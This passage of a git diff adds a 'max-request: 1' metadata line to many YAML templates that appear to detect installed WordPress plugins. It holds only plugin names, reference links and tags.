https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ 